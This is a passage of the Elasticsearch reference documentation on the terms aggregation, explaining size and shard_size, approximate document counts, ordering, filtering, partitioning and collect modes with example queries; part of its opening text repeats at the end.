\"key\" : \"electronic\",\n \"doc_count\" : 6\n },\n {\n \"key\" : \"rock\",\n 
\"doc_count\" : 3\n },\n {\n \"key\" : \"jazz\",\n \"doc_count\" : 2\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n<1> an upper bound of the error on the document counts for each term, see <<search-aggregations-bucket-terms-aggregation-approximate-counts,below>>\n<2> when there are lots of unique terms, Elasticsearch only returns the top terms; this number is the sum of the document counts for all buckets that are not part of the response\n<3> the list of the top buckets, the meaning of `top` being defined by the <<search-aggregations-bucket-terms-aggregation-order,order>>\n\nBy default, the `terms` aggregation will return the buckets for the top ten terms ordered by the `doc_count`. One can\nchange this default behaviour by setting the `size` parameter.\n\n[[search-aggregations-bucket-terms-aggregation-size]]\n==== Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By\ndefault, the node coordinating the search process will request each shard to provide its own top `size` term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nThis means that if the number of unique terms is greater than `size`, the returned list is slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned).\n\nNOTE: If you want to retrieve **all** terms or all combinations of terms in a nested `terms` aggregation\n you should use the <<search-aggregations-bucket-composite-aggregation,Composite>> aggregation which\n allows to paginate over all possible terms rather than setting a size greater than the cardinality of the field in the\n `terms` aggregation. The `terms` aggregation is meant to return the `top` terms and does not allow pagination.\n\n[[search-aggregations-bucket-terms-aggregation-approximate-counts]]\n==== Document counts are approximate\n\nAs described above, the document counts (and the results of any sub aggregations) in the terms aggregation are not always\naccurate. This is because each shard provides its own view of what the ordered list of terms should be and these are\ncombined to give a final view. Consider the following scenario:\n\nA request is made to obtain the top 5 terms in the field product, ordered by descending document count from an index with\n3 shards. 
In this case each shard is asked to give its top 5 terms.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\nThe terms for each of the three shards are shown below with their\nrespective document counts in brackets:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n| 6 | Product F (2) | Product H (14) | Product H (28)\n| 7 | Product G (2) | Product I (10) | Product Q (2)\n| 8 | Product H (2) | Product Q (6) | Product D (1)\n| 9 | Product I (1) | Product J (8) |\n| 10 | Product J (1) | Product C (4) |\n\n|=========================================================\n\nThe shards will return their top 5 terms so the results from the shards will be:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n\n|=========================================================\n\nTaking the top 5 results from each of the shards (as requested) and combining them to make a final top 5 list produces\nthe following:\n\n[width=\"40%\",cols=\"^2,^2\"]\n|=========================================================\n\n| 1 | Product A (100)\n| 2 | Product Z (52)\n| 3 | Product C (50)\n| 4 | Product G (45)\n| 5 | Product B (43)\n\n|=========================================================\n\nBecause Product A was returned from all shards we know that its document count value is accurate. Product C was only\nreturned by shards A and C so its document count is shown as 50 but this is not an accurate count. Product C exists on\nshard B, but its count of 4 was not high enough to put Product C into the top 5 list for that shard. Product Z was also\nreturned only by 2 shards but the third shard does not contain the term. There is no way of knowing, at the point of\ncombining the results to produce the final list of terms, that there is an error in the document count for Product C and\nnot for Product Z. Product H has a document count of 44 across all 3 shards but was not included in the final list of\nterms because it did not make it into the top five terms on any of the shards.\n\n==== Shard Size\n\nThe higher the requested `size` is, the more accurate the results will be, but also, the more expensive it will be to\ncompute the final results (both due to bigger priority queues that are managed on a shard level and due to bigger data\ntransfers between the nodes and the client).\n\nThe `shard_size` parameter can be used to minimize the extra work that comes with bigger requested `size`. When defined,\nit will determine how many terms the coordinating node will request from each shard. 
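\n\nFor illustration only, here is a minimal sketch of the request above with an explicit `shard_size` (it reuses the `product` field from the examples on this page; the value 30 is an arbitrary number picked for this sketch, not a recommendation):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n    \"aggs\" : {\n        \"products\" : {\n            \"terms\" : {\n                \"field\" : \"product\",\n                \"size\" : 5,\n                \"shard_size\" : 30\n            }\n        }\n    }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\n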
Once all the shards have responded, the\ncoordinating node will then reduce them to a final result which will be based on the `size` parameter - this way,\none can increase the accuracy of the returned terms and avoid the overhead of streaming a big list of buckets back to\nthe client.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, Elasticsearch will\n override it and reset it to be equal to `size`.\n\n\nThe default `shard_size` will be `size` if the search request needs to go to a single shard, and `(size * 1.5 + 10)`\notherwise.\n\n==== Calculating Document Count Error\n\nThere are two error values which can be shown on the terms aggregation. The first gives a value for the aggregation as\na whole which represents the maximum potential document count for a term which did not make it into the final list of\nterms. This is calculated as the sum of the document count from the last term returned from each shard. For the example\ngiven above the value would be 46 (2 + 15 + 29). This means that in the worst case scenario a term which was not returned\ncould have the 4th highest document count.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"sum_other_doc_count\" : 79,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52\n }\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n\/\/ TESTRESPONSE[s\/: (\\-)?[0-9]+\/: $body.$_path\/]\n\n==== Per bucket document count error\n\nThe second error value can be enabled by setting the `show_term_doc_count_error` parameter to true:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5,\n \"show_term_doc_count_error\": true\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\n\nThis shows an error value for each term returned by the aggregation which represents the 'worst case' error in the document count\nand can be useful when deciding on a value for the `shard_size` parameter. This is calculated by summing the document counts for\nthe last term returned by all shards which did not return the term. In the example above the error in the document count for Product C\nwould be 15, as Shard B was the only shard not to return the term and the document count of the last term it did return was 15.\nThe actual document count of Product C was 54, so the document count was only actually off by 4 even though the worst case was that\nit would be off by 15. 
Product A, however, has an error of 0 for its document count; since every shard returned it, we can be confident\nthat the count returned is accurate.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"sum_other_doc_count\" : 79,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100,\n \"doc_count_error_upper_bound\" : 0\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52,\n \"doc_count_error_upper_bound\" : 2\n }\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n\/\/ TESTRESPONSE[s\/: (\\-)?[0-9]+\/: $body.$_path\/]\n\nThese errors can only be calculated in this way when the terms are ordered by descending document count. When the aggregation is\nordered by the term values themselves (either ascending or descending) there is no error in the document count, since if a shard\ndoes not return a particular term which appears in the results from another shard, it must not have that term in its index. When the\naggregation is either sorted by a sub aggregation or in order of ascending document count, the error in the document counts cannot be\ndetermined and is given a value of -1 to indicate this.\n\n[[search-aggregations-bucket-terms-aggregation-order]]\n==== Order\n\nThe order of the buckets can be customized by setting the `order` parameter. By default, the buckets are ordered by\ntheir `doc_count` descending. It is possible to change this behaviour as documented below:\n\nWARNING: Sorting by ascending `_count` or by sub aggregation is discouraged as it increases the\n<<search-aggregations-bucket-terms-aggregation-approximate-counts,error>> on document counts.\nIt is fine when a single shard is queried, or when the field that is being aggregated was used\nas a routing key at index time: in these cases results will be accurate since shards have disjoint\nvalues. In all other cases, errors are unbounded. 
One particular case that could still be useful\nis sorting by a <<search-aggregations-metrics-min-aggregation,`min`>> or\n<<search-aggregations-metrics-max-aggregation,`max`>> aggregation: counts will not be accurate\nbut at least the top buckets will be correctly picked.\n\nOrdering the buckets by their doc `_count` in an ascending manner:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"_count\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nOrdering the buckets alphabetically by their terms in an ascending manner:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"_key\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\ndeprecated[6.0.0, Use `_key` instead of `_term` to order buckets by their term]\n\nOrdering the buckets by a single-value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"max_play_count\" : \"desc\" }\n },\n \"aggs\" : {\n \"max_play_count\" : { \"max\" : { \"field\" : \"play_count\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nOrdering the buckets by a multi-value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"order\" : { \"playback_stats.max\" : \"desc\" }\n },\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[NOTE]\n.Pipeline aggs cannot be used for sorting\n=======================================\n\n<<search-aggregations-pipeline,Pipeline aggregations>> are run during the\nreduce phase after all other aggregations have already completed. For this\nreason, they cannot be used for ordering.\n\n=======================================\n\nIt is also possible to order the buckets based on a \"deeper\" aggregation in the hierarchy. This is supported as long\nas the aggregation path is of a single-bucket type, where the last aggregation in the path may either be a single-bucket\none or a metrics one. If it's a single-bucket type, the order will be defined by the number of docs in the bucket (i.e. `doc_count`);\nin case it's a metrics one, the same rules as above apply (where the path must indicate the metric name to sort by in case of\na multi-value metrics aggregation, and in case of a single-value metrics aggregation the sort will be applied on that value).\n\nThe path must be defined in the following form:\n\n\/\/ https:\/\/en.wikipedia.org\/wiki\/Extended_Backus%E2%80%93Naur_Form\n[source,ebnf]\n--------------------------------------------------\nAGG_SEPARATOR = '>' ;\nMETRIC_SEPARATOR = '.' 
;\nAGG_NAME = <the name of the aggregation> ;\nMETRIC = <the name of the metric (in case of multi-value metrics aggregation)> ;\nPATH = <AGG_NAME> [ <AGG_SEPARATOR>, <AGG_NAME> ]* [ <METRIC_SEPARATOR>, <METRIC> ] ;\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"artist.country\",\n \"order\" : { \"rock>playback_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"rock\" : {\n \"filter\" : { \"term\" : { \"genre\" : \"rock\" }},\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above will sort the artists' countries buckets based on the average play count among the rock songs.\n\nMultiple criteria can be used to order the buckets by providing an array of order criteria such as the following:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"artist.country\",\n \"order\" : [ { \"rock>playback_stats.avg\" : \"desc\" }, { \"_count\" : \"desc\" } ]\n },\n \"aggs\" : {\n \"rock\" : {\n \"filter\" : { \"term\" : { \"genre\" : \"rock\" }},\n \"aggs\" : {\n \"playback_stats\" : { \"stats\" : { \"field\" : \"play_count\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above will sort the artists' countries buckets based on the average play count among the rock songs and then by\ntheir `doc_count` in descending order.\n\nNOTE: In the event that two buckets share the same values for all order criteria, the bucket's term value is used as a\ntie-breaker in ascending alphabetical order to prevent non-deterministic ordering of buckets.\n\n==== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"min_doc_count\": 10\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe above aggregation would only return tags which have been found in 10 hits or more. The default value is `1`.\n\n\nTerms are collected and ordered on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global document count available. The decision of whether a term is added to a candidate list depends only on the order computed on the shard using local shard frequencies. The `min_doc_count` criterion is only applied after merging the local terms statistics of all shards. In a way, the decision to add the term as a candidate is made without being very _certain_ that the term will actually reach the required `min_doc_count`. This might cause many (globally) high-frequency terms to be missing in the final result if low-frequency terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic.\n\n===== The `shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has, relative to `min_doc_count`, about whether a term should actually be added to the candidate list. 
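\n\nAs a hedged sketch (this request is not in the original text; the `tags` field is reused from the example above and both threshold values are arbitrary assumptions), combining the two parameters could look like this:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"min_doc_count\": 10,\n \"shard_min_doc_count\": 2\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nHere each shard would drop low-frequency candidate terms (those below the shard-level threshold) before the global `min_doc_count` of 10 is applied during the final merge.\n\n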
Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low-frequency terms and you are not interested in those (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that, with reasonable certainty, will not reach the required `min_doc_count` even after merging the local counts. `shard_min_doc_count` is set to `0` by default and has no effect unless you explicitly set it.\n\n\n\nNOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. However, some of\n the returned terms which have a document count of zero might only belong to deleted documents or documents\n from other types, so there is no guarantee that a `match_all` query would find a positive document count for\n those terms.\n\nWARNING: When NOT sorting on `doc_count` descending, high values of `min_doc_count` may return a number of buckets\n which is less than `size` because not enough data was gathered from the shards. Missing buckets can be\n brought back by increasing `shard_size`.\n Setting `shard_min_doc_count` too high will cause terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count\/#shards`.\n\n[[search-aggregations-bucket-terms-aggregation-script]]\n==== Script\n\nGenerating the terms using a script:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"script\" : {\n \"source\": \"doc['genre'].value\",\n \"lang\": \"painless\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThis will interpret the `script` parameter as an `inline` script with the default script language and no script parameters. To use a stored script, use the following syntax:\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nPOST \/_scripts\/my_script\n{\n \"script\": {\n \"lang\": \"painless\",\n \"source\": \"doc[params.field].value\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"script\" : {\n \"id\": \"my_script\",\n \"params\": {\n \"field\": \"genre\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n==== Value Script\n\nA value script transforms each value of the field before bucketing; here every `genre` value is given a prefix:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : {\n \"field\" : \"genre\",\n \"script\" : {\n \"source\" : \"'Genre: ' + _value\",\n \"lang\" : \"painless\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n==== Filtering Values\n\nIt is possible to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters, which are based on regular expression strings or arrays of exact values. 
Additionally,\n`include` clauses can filter using `partition` expressions.\n\n===== Filtering Values with regular expressions\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : \".*sport.*\",\n \"exclude\" : \"water_.*\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIn the above example, buckets will be created for all the tags that have the word `sport` in them, except those starting\nwith `water_` (so the tag `water_sports` will not be aggregated). The `include` regular expression will determine what\nvalues are \"allowed\" to be aggregated, while the `exclude` determines the values that should not be aggregated. When\nboth are defined, the `exclude` takes precedence, meaning the `include` is evaluated first and only then the `exclude`.\n\nThe syntax is the same as <<regexp-syntax,regexp queries>>.\n\n===== Filtering Values with exact values\n\nFor matching based on exact values, the `include` and `exclude` parameters can simply take an array of\nstrings that represent the terms as they are found in the index:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"JapaneseCars\" : {\n \"terms\" : {\n \"field\" : \"make\",\n \"include\" : [\"mazda\", \"honda\"]\n }\n },\n \"ActiveCarManufacturers\" : {\n \"terms\" : {\n \"field\" : \"make\",\n \"exclude\" : [\"rover\", \"jensen\"]\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n===== Filtering Values with partitions\n\nSometimes there are too many unique terms to process in a single request\/response pair, so\nit can be useful to break the analysis up into multiple requests.\nThis can be achieved by grouping the field's values into a number of partitions at query-time and processing\nonly one partition in each request.\nConsider this request, which is looking for accounts that have not logged any access recently:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"size\": 0,\n \"aggs\": {\n \"expired_sessions\": {\n \"terms\": {\n \"field\": \"account_id\",\n \"include\": {\n \"partition\": 0,\n \"num_partitions\": 20\n },\n \"size\": 10000,\n \"order\": {\n \"last_access\": \"asc\"\n }\n },\n \"aggs\": {\n \"last_access\": {\n \"max\": {\n \"field\": \"access_date\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThis request is finding the last logged access date for a subset of customer accounts because we\nmight want to expire some customer accounts who haven't been seen for a long while.\nThe `num_partitions` setting has requested that the unique account_ids are organized evenly into twenty\npartitions (0 to 19), and the `partition` setting in this request filters to only consider account_ids falling\ninto partition 0. Subsequent requests should ask for partitions 1, then 2, and so on, to complete the expired-account analysis.\n\nNote that the `size` setting for the number of results returned needs to be tuned with the `num_partitions`.\nFor this particular account-expiration example the process for balancing values for `size` and `num_partitions` would be as follows:\n\n1. Use the `cardinality` aggregation to estimate the total number of unique account_id values\n2. Pick a value for `num_partitions` to break the number from step 1 up into more manageable chunks\n3. 
Pick a `size` value for the number of responses we want from each partition\n4. Run a test request\n\nIf we get a circuit-breaker error, we are trying to do too much in one request and must increase `num_partitions`.\nIf the request was successful but the last account ID in the date-sorted test response is still an account we might want to\nexpire, then we may be missing accounts of interest and have set our numbers too low. We must either\n\n* increase the `size` parameter to return more results per partition (could be heavy on memory) or\n* increase the `num_partitions` to consider fewer accounts per request (could increase overall processing time as we need to make more requests)\n\nUltimately this is a balancing act between managing the Elasticsearch resources required to process a single request and the volume\nof requests that the client application must issue to complete a task.\n\n==== Multi-field terms aggregation\n\nThe `terms` aggregation does not support collecting terms from multiple fields\nin the same document. The reason is that the `terms` agg doesn't collect the\nstring term values themselves, but rather uses\n<<search-aggregations-bucket-terms-aggregation-execution-hint,global ordinals>>\nto produce a list of all of the unique values in the field. Using global ordinals\nresults in an important performance boost which would not be possible across\nmultiple fields.\n\nThere are two approaches that you can use to perform a `terms` agg across\nmultiple fields:\n\n<<search-aggregations-bucket-terms-aggregation-script,Script>>::\n\nUse a script to retrieve terms from multiple fields. This disables the global\nordinals optimization and will be slower than collecting terms from a single\nfield, but it gives you the flexibility to implement this option at search\ntime.\n\n<<copy-to,`copy_to` field>>::\n\nIf you know ahead of time that you want to collect the terms from two or more\nfields, then use `copy_to` in your mapping to create a new dedicated field at\nindex time which contains the values from both fields. You can aggregate on\nthis single field, which will benefit from the global ordinals optimization.\n\n==== Collect mode\n\nDeferring calculation of child aggregations\n\nFor fields with many unique terms and a small number of required results, it can be more efficient to delay the calculation\nof child aggregations until the top parent-level aggs have been pruned. Ordinarily, all branches of the aggregation tree\nare expanded in one depth-first pass and only then does any pruning occur.\nIn some scenarios this can be very wasteful and can hit memory constraints.\nAn example problem scenario is querying a movie database for the 10 most popular actors and their 5 most common co-stars:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nEven though the number of actors may be comparatively small and we want only 50 result buckets, there is a combinatorial explosion of buckets\nduring calculation - a single actor can produce n\u00b2 buckets where n is the number of actors. The sane option would be to first determine\nthe 10 most popular actors and only then examine the top co-stars for these 10 actors. 
This alternative strategy is what we call the `breadth_first` collection\nmode as opposed to the `depth_first` mode.\n\nNOTE: `breadth_first` is the default mode for fields with a cardinality bigger than the requested size or when the cardinality is unknown (numeric fields or scripts for instance).\nIt is possible to override the default heuristic and to provide a collect mode directly in the request:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10,\n \"collect_mode\" : \"breadth_first\" <1>\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> the possible values are `breadth_first` and `depth_first`\n\nWhen using `breadth_first` mode, the set of documents that fall into the uppermost buckets is\ncached for subsequent replay, so there is a memory overhead in doing this which is linear with the number of matching documents.\nNote that the `order` parameter can still be used to refer to data from a child aggregation when using the `breadth_first` setting - the parent\naggregation understands that this child aggregation will need to be called first before any of the other child aggregations.\n\nWARNING: Nested aggregations such as `top_hits` which require access to score information under an aggregation that uses the `breadth_first`\ncollection mode need to replay the query on the second pass, but only for the documents belonging to the top buckets.\n\n[[search-aggregations-bucket-terms-aggregation-execution-hint]]\n==== Execution hint\n\nThere are different mechanisms by which terms aggregations can be executed:\n\n - by using field values directly in order to aggregate data per-bucket (`map`)\n - by using global ordinals of the field and allocating one bucket per global ordinal (`global_ordinals`)\n\nElasticsearch tries to have sensible defaults, so this is something that generally doesn't need to be configured.\n\n`global_ordinals` is the default option for `keyword` fields. It uses global ordinals to allocate buckets dynamically,\nso memory usage is linear in the number of values of the documents that are part of the aggregation scope.\n\n`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution mode\nis significantly faster. 
By default, `map` is only used when running an aggregation on scripts, since they don't have\nordinals.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"execution_hint\": \"map\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> The possible values are `map` and `global_ordinals`\n\nPlease note that Elasticsearch will ignore this execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints.\n\n==== Missing value\n\nThe `missing` parameter defines how documents that are missing a value should be treated.\nBy default they will be ignored, but it is also possible to treat them as if they\nhad a value.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"missing\": \"N\/A\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> Documents without a value in the `tags` field will fall into the same bucket as documents that have the value `N\/A`.\n\n==== Mixing field types\n\nWARNING: When aggregating on multiple indices the type of the aggregated field may not be the same in all indices.\nSome types are compatible with each other (`integer` and `long` or `float` and `double`) but when the types are a mix\nof decimal and non-decimal numbers the terms aggregation will promote the non-decimal numbers to decimal numbers.\nThis can result in a loss of precision in the bucket values.\n"
\"rock\",\n \"doc_count\" : 3\n },\n {\n \"key\" : \"jazz\",\n \"doc_count\" : 2\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\\.\\.\\.\/\/]\n<1> an upper bound of the error on the document counts for each term, see <<search-aggregations-bucket-terms-aggregation-approximate-counts,below>>\n<2> when there are lots of unique terms, Elasticsearch only returns the top terms; this number is the sum of the document counts for all buckets that are not part of the response\n<3> the list of the top buckets, the meaning of `top` being defined by the <<search-aggregations-bucket-terms-aggregation-order,order>>\n\nBy default, the `terms` aggregation will return the buckets for the top ten terms ordered by the `doc_count`. One can\nchange this default behaviour by setting the `size` parameter.\n\n[[search-aggregations-bucket-terms-aggregation-size]]\n==== Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By\ndefault, the node coordinating the search process will request each shard to provide its own top `size` term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nThis means that if the number of unique terms is greater than `size`, the returned list is slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned).\n\nNOTE: If you want to retrieve **all** terms or all combinations of terms in a nested `terms` aggregation\n you should use the <<search-aggregations-bucket-composite-aggregation,Composite>> aggregation which\n allows to paginate over all possible terms rather than setting a size greater than the cardinality of the field in the\n `terms` aggregation. The `terms` aggregation is meant to return the `top` terms and does not allow pagination.\n\n[[search-aggregations-bucket-terms-aggregation-approximate-counts]]\n==== Document counts are approximate\n\nAs described above, the document counts (and the results of any sub aggregations) in the terms aggregation are not always\naccurate. This is because each shard provides its own view of what the ordered list of terms should be and these are\ncombined to give a final view. Consider the following scenario:\n\nA request is made to obtain the top 5 terms in the field product, ordered by descending document count from an index with\n3 shards. 
In this case each shard is asked to give its top 5 terms.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\nThe terms for each of the three shards are shown below with their\nrespective document counts in brackets:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n| 6 | Product F (2) | Product H (14) | Product H (28)\n| 7 | Product G (2) | Product I (10) | Product Q (2)\n| 8 | Product H (2) | Product Q (6) | Product D (1)\n| 9 | Product I (1) | Product J (8) |\n| 10 | Product J (1) | Product C (4) |\n\n|=========================================================\n\nThe shards will return their top 5 terms so the results from the shards will be:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n\n|=========================================================\n\nTaking the top 5 results from each of the shards (as requested) and combining them to make a final top 5 list produces\nthe following:\n\n[width=\"40%\",cols=\"^2,^2\"]\n|=========================================================\n\n| 1 | Product A (100)\n| 2 | Product Z (52)\n| 3 | Product C (50)\n| 4 | Product G (45)\n| 5 | Product B (43)\n\n|=========================================================\n\nBecause Product A was returned from all shards we know that its document count value is accurate. Product C was only\nreturned by shards A and C so its document count is shown as 50 but this is not an accurate count. Product C exists on\nshard B, but its count of 4 was not high enough to put Product C into the top 5 list for that shard. Product Z was also\nreturned only by 2 shards but the third shard does not contain the term. There is no way of knowing, at the point of\ncombining the results to produce the final list of terms, that there is an error in the document count for Product C and\nnot for Product Z. Product H has a document count of 44 across all 3 shards but was not included in the final list of\nterms because it did not make it into the top five terms on any of the shards.\n\n==== 